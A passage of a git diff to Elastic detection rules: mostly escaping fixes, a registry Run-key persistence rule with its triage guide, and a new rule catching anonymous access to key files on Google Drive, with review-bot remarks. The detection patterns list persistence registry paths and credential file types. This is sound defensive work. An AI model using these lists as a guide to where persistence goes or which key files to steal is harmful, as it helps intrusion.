this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n 
process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json index 7804efd5bc4..1dc61a55a28 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as 
this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n 
process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
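Review bot: The investigation guide on the new-side `note` line still reads `These programs will executed under the context of the user`; the unescaping pass leaves the sentence ungrammatical in the shipped rule text, so `These programs will be executed under the context of the user` should be corrected in the source rule before the next export regenerates this file. The hunk in question is the one opened by the `@@ -11,7 +11,7 @@` header earlier in this file section; the second hunk on this line only changes the `framework` string.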
diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json
index 239bd5615e5..58af073a235 100644
--- a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json
index 387c49676cb..d8438836f2f 100644
--- a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_3.json
new file mode 100644
index 00000000000..31c50a91526
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_3.json
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an external (anonymous) user has viewed, copied or downloaded an encryption key file from a Google Workspace drive. Adversaries may gain access to encryption keys stored in private drives from rogue access links that do not have an expiration. Access to encryption keys may allow adversaries to access sensitive data or authenticate on behalf of users.", + "false_positives": [ + "A user may generate a shared access link to encryption key files to share with others. It is unlikely that the intended recipient is an external or anonymous user." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Google Workspace Drive Encryption Key(s) Accessed from Anonymous User", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "file where event.dataset == \"google_workspace.drive\" and event.action : (\"copy\", \"view\", \"download\") and\n google_workspace.drive.visibility: \"people_with_link\" and source.user.email == \"\" and\n file.extension: (\n \"token\",\"assig\", \"pssc\", \"keystore\", \"pub\", \"pgp.asc\", \"ps1xml\", \"pem\", \"gpg.sig\", \"der\", \"key\",\n \"p7r\", \"p12\", \"asc\", \"jks\", \"p7b\", \"signature\", \"gpg\", \"pgp.sig\", \"sst\", \"pgp\", \"gpgz\", \"pfx\", \"crt\",\n \"p8\", \"sig\", \"pkcs7\", \"jceks\", \"pkcs8\", \"psc1\", \"p7c\", \"csr\", \"cer\", \"spc\", \"ps2xml\")\n", + "references": [ + "https://support.google.com/drive/answer/2494822" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.drive.visibility", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.user.email", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "980b70a0-c820-11ed-8799-f661ea17fbcc", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": 
"https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "980b70a0-c820-11ed-8799-f661ea17fbcc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json b/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json index 3999875fd7f..d3dc119ea04 100644 --- a/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json index 187b637ac13..4af3e238968 100644 --- a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
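Review bot: The anonymous-actor condition in the new rule's query, `source.user.email == ""`, only matches events that carry the field as an empty string; if the google_workspace integration omits `source.user.email` for link-based access instead of emitting an empty value, this clause never matches and the rule is silently blind to the exact case it is written for (inferred from the query alone — confirm against sample drive events before merging). If both shapes occur in practice, `(source.user.email == "" or source.user.email == null)` covers them, using the same null-comparison form other rules in this package already rely on. The file is also written without a trailing newline; that is fine if the exporter produces every rule file that way, otherwise it is worth normalising.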
diff --git a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json
index 5437d1f405d..3d9b5ae459e 100644
--- a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json
index b0bde1bf058..fde728dcae8 100644
--- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json
index a729bbb5e09..e842959238b 100644
--- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json
index 85efda3a289..16cd55e8945 100644
--- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json
index b731f4fe502..133849155c0 100644
--- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json
index 241149e7d9b..bcb78693efc 100644
--- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
